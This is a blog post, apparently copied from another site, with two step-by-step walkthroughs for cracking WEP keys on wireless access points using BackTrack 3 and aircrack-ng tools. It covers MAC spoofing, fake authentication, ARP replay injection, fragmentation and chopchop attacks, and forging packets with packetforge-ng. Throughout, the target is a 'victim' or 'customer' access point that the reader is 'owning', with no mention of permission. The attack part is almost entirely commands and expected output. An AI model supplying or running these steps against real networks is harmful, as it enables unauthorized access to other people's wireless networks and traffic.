Kartikey Sapra
just found it on some site, so thought of sharing it wid u guys

method one:

1 copy of BackTrack 3 *newest release* (GOOGLE IT)
* 1 wireless router
* Laptop with wireless capabilities/wireless card -- There are a few cards that can't do the injection!!!
* A secure place to work (so you don't disturb other AP's)

In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request re injection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, or connecting to the AP.

************************************************** *********************
Here are some things you need to know before you get confused
When you see this (device) or (bssid) you DON'T put the ( )!!!
(device) = Your wireless card *can be seen by typing in iwconfig EG: eth0, eth1, ath0, ath1
(bssid) = This is the victims bssid *when you start airodump-ng if there is a AP in range it will show up on the left side will look similar to 00:11:22:3355
************************************************** **********************

Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons home and system. Double click the home icon, rigt click the blank white area and select create new Txt File name it j4m13 or what ever you want! click ok, now close the window.

Ok let's start!
Commands | Meaning

*open up 3 shell konsoles by clicking the little black box next to the start button.

* The first thing were going to do is stop the device aka ethernet card
airmon-ng stop ath0

* Now were going to put the wireless card down, so we can fake a mac adress (to see available wireless cards type, iwconfig
ifconfig (device) down

* Ok now just to make things simpler, so we don't have to hunt down what our Mac address is
macchanger --mac 00:11:22:3355 (device)

* Now were going to start the wireless card *make it listen for AP's
airmon-ng start (device)

* Lets start seeing what AP's are there
airodump-ng (device)

* After you see all the AP's execute the following command to stop it and copy the bssid
CTRL+C Copy bssid of customer

* Now on to the customer's AP (were listening in for authentication packets
airodump-ng -c 6 -w j4m13 --bssid (Bssid) (device)

* Lets get on with making more Data, and start the injection process
aireplay-ng -l 0 -a (bssid) -h 00:11:22:3355 (device)

* Now were going to inject the router ***this sometimes takes a while to actually inject!
aireplay-ng -3 -b (bssid) -h 00:11:22:3355 (device)

* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV's for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IV's for 128 bit encryption
aircrack-ng -n 64 --bssid (bssid) j4m13-01.cap

* Once you crack the wep key you wright it down, and reboot to windows. Now put it in the username and the password with out the :
EG: Wep Key = 33:C7:C6:09:30
When Entered into username and password it will look like this. 33C7C60930

method two:

************************************************** ************************************
How to crack WEP encryption with NO clients.
************************************************** ************************************

************************************************** ************************************
************************************************** ************************************

Im assuming you followed above tut so I can jump right into this...

-Make sure there is some data coming from access point. Beacons and other packets are useless for this method.
-Make sure the WEP is "open authentication" "shared key authentication" will not work with this method.
-Make sure you DO NOT spoof your wireless card's MAC.

-We will be using the following key so that we're all on the same page and understanding...
-Your wireless card's MAC address= (MY MAC)
-MAC address of access point you are trying to crack= (BSSID)
-Access point's name= (ESSID)
-Access point's channel= (AP CH)
-Your wireless interface= (ATH0)
-Comments will be displayed within these brackets. -[example]-
-Commands will start with $ -[$example]-
-Make sure you gather the posted ^ necessary information for the access point you will be owning. Follow along and change the necessary fields as needed.

************************************************** ************************************
************************************************** ************************************

************************************************** ************************************
************************************************** ************************************

-There are seven (7) steps to this procedure.
-1.Start your wireless interface in monitor mode in channel (AP CH).
-2.Use aireplay-ng to do a fake authentication with the access point.
-3.Use aireplay-ng chopchop or fragmenation attack to obtain PRGA. -[pseudo random generation algorithm]-
-4.Use packetforge-ng to create an arp packet using the PRGA obtained in the previous step.
-5.Start airodump-ng on (AP CH) with filter for (BSSID) to collect the new unique IVs. -[Initiation Vector]-
-6.Inject the arp packet created in step 4.
-7.Run aircrack-ng to crack key using the IVs collected.

************************************************** ************************************
************************************************** ************************************

-STEP ONE (1) start the wireless interface in monitor mode on (AP CH). Open a console and enter...

$airmon-ng start wifi0 (AP CH)

-[In this command we use “wifi0” instead of (ATH0) This is because the madwifi-ng drivers are being used.]-

-To confirm your wireless card is in fact in monitor mode enter...


-[Mode should read "Monitor"]-

-[To match your wireless card frequency to the (AP CH) use this chart ]-

************************************************** ************************************
************************************************** ************************************

-STEP TWO (2) use aireplay-ng to do a fake authentication with the access point...

$aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (MY MAC) (ATH0)

-[-1 means fake authentication, 0 reassociation timing in seconds, -a access point, -h your MAC]-

-[One of two things will happen after this command. Either "Association successful :-)" or it will go into a loop of "Authentication successful, Sending Association Request". Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list and that is another tutorial all its own ;] ]-

************************************************** ************************************
************************************************** ************************************

-STEP THREE (3) use aireplay-ng chopchop or fragmenation attack to obtain PRGA. Start another console enter...

$aireplay-ng -5 -b (BSSID) -h (MY MAC) (ATH0)

-[5 means the fragmentation attack]-
-[This PRGA is not the WEP key and cannot be used to decrypt packets but it will later be used to create new packets for injection.]-
-[Either the chopchop or fragmentation attacks can be used to obtain the PRGA bit file. The result is the same]-
-[If one does not work try the other]-

When a packet from the access point arrives hit the "y" key to proceed.

-[You might need to try a few packets to be successful]-

If successful, the system reponds:

"Saving chosen packet in replay_src-0203-180328.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0203-180343.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream"

-[That is only an example your system will save the .xor file under a different name]-

If the fragmentation attack was not successful, you can then try the chopchop technique next by running...

$aireplay-ng -4 -h (MY MAC) -b (BSSID) (ATH0)

-[4means the chopchop attack]-

Once again respond "y" and the machine will recreate the arp header.

The .xor file which the machine saves can be used in the next step to generate your much needed arp packet.

-[Make sure the packet is 68 or more bytes otherwise you may not have enough PRGA data to subsquently generate a packet.]-
-[If the first packet you select does not work, then try a few others. Sometimes it takes more then one try to be successful with either attack.]-

************************************************** ************************************
************************************************** ************************************

STEP FOUR (4) use packetforge-ng to create an arp packet...

$packetforge-ng -0 -a (BSSID) -h (MY MAC) -k -l -y .xor -w arp-request

-[-0 means generate an arp packet, -k is the destination IP, -l is the source IP, -y .xor is file to read the PRGA from, -w arp-request is name of file to write the arp packet to]-

-[.xor make sure you input the correct file name from step 3 ex. fragment-8738-927426.xor]-

The system will respond:

"Wrote packet to: arp-request"

************************************************** ************************************
************************************************** ************************************

STEP FIVE (5) open another console Start airodump-ng...

$airodump-ng -c (AP CH) --bssid (BSSID) -w capture (ATH0)

-[-w capture is file name prefix for the file which will contain the captured packets.]-

************************************************** ************************************
************************************************** ************************************

STEP SIX (6) inject the arp packet. Using the console session where you generated the arp packet, enter...

$aireplay-ng -2 -r arp-request (ATH0)

-[-2 means use interactive frame selection]-
-[-r arp-request defines the file name from which to read the arp packet]-

Enter “y” to use the packet. The system kindly responds by showing how many packets it is injecting and is smart enough to remind you to start airodumump if it has not already been started.

-[If the BSSID data packets are not increasing, make sure you are still associated with the access point.]-

************************************************** ************************************
************************************************** ************************************

STEP SEVEN (7) Run aircrack-ng to obtain the WEP key. Start another console session and enter...

$aircrack-ng -b (BSSID) capture*.cap

-[capture*.cap selects all dump files starting with “capture” and ending in “cap”.]-

You can run this while generating packets. Go raid your fridge for a bite and drink while the WEP key is being cracked.

************************************************** ************************************
************************************************** ************************************

This might seem like a very long process but don't be discouraged it should take you no more than 45 minutes to complete. It took me longer to write this tut than its going to take you to execute. The more you do it and the more you familiarize yourself with the commands the sooner you will be able to do it from brain memory.
Labels: ,
0 Responses

Post a Comment